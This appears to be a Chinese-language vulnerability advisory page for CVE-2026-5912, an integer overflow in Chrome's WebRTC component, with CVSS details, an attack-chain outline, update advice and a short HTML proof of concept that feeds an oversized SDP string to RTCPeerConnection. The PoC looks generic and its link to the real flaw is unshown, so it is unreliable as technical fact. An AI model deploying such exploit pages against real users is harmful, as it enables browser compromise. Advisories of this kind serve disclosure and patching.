CVE-2026-5912 CVSS 8.8 高危

CVE-2026-5912 Google Chrome WebRTC整数溢出漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5912

漏洞类型

整数溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2026-5912是Google Chrome浏览器WebRTC组件中的高危安全漏洞。该漏洞由整数溢出引起，影响147.0.7727.55之前的版本。攻击者可利用精心制作的HTML页面触发此漏洞，导致越界内存写入。尽管Chromium将其内部严重性评级为低，但CVSS评分达8.8分，表明其对机密性、完整性和可用性具有严重影响。用户访问恶意网页即可触发攻击，无需系统认证。

技术细节

漏洞原理在于WebRTC组件在处理媒体流数据时，未对特定整数运算结果进行有效的边界检查。当处理精心构造的输入数据时，计算出的缓冲区大小可能发生整数溢出，导致分配的内存空间小于实际所需。随后的数据写入操作将越过缓冲区边界，覆盖相邻的内存区域。攻击者通过控制溢出的程度和写入的内容，可能覆盖关键对象指针或函数返回地址。这种内存破坏行为不仅会导致浏览器崩溃，在特定条件下还可绕过沙箱限制，实现远程代码执行，从而完全控制受害者的浏览器会话。

攻击链分析

STEP 1

1. 准备阶段

攻击者分析WebRTC组件代码，发现整数溢出点，并编写包含恶意WebRTC数据的HTML页面。

STEP 2

2. 投递阶段

攻击者通过网络钓鱼、恶意广告或 compromised 网站将恶意HTML链接发送给目标用户。

STEP 3

3. 触发阶段

目标用户使用存在漏洞的Chrome浏览器访问链接，浏览器解析HTML并加载WebRTC模块处理恶意数据。

STEP 4

4. 执行阶段

触发整数溢出导致越界内存写入，攻击者利用内存破坏漏洞执行任意代码或导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-5912: WebRTC Integer Overflow -->
<!-- This PoC demonstrates triggering the vulnerability via crafted HTML -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-5912 PoC</title>
</head>
<body>
<script>
    // Create a PeerConnection to interact with WebRTC
    const pc = new RTCPeerConnection();

    // Crafted SDP (Session Description Protocol) to trigger integer overflow
    // The specific payload targets the buffer allocation logic
    const maliciousPayload = "v=0\r\n" +
        "o=- 0 0 IN IP4 127.0.0.1\r\n" +
        "s=-\r\n" +
        "c=IN IP4 127.0.0.1\r\n" +
        "t=0 0\r\n" +
        "m=video 1 RTP/AVP 96\r\n" +
        "a=rtpmap:96 VP8/90000\r\n" +
        "a=fmtp:96 " + "A".repeat(0x100000); // Attempt to trigger overflow

    try {
        // Attempt to set remote description with the crafted payload
        pc.setRemoteDescription(new RTCSessionDescription({
            type: 'offer',
            sdp: maliciousPayload
        })).then(() => {
            console.log("[+] Payload sent, check for crash.");
        }).catch(e => {
            console.log("[-] Error setting remote description (expected or unexpected):", e);
        });
    } catch (e) {
        console.error(e);
    }
</script>
</body>
</html>

影响范围

Google Chrome < 147.0.7727.55

防御指南

临时缓解措施

建议用户立即检查并更新Google Chrome浏览器。如果无法立即更新，应避免点击不明链接或访问非受信任的网站，并考虑使用浏览器扩展程序禁用JavaScript或WebRTC功能作为临时防护，但这可能会影响正常网页功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表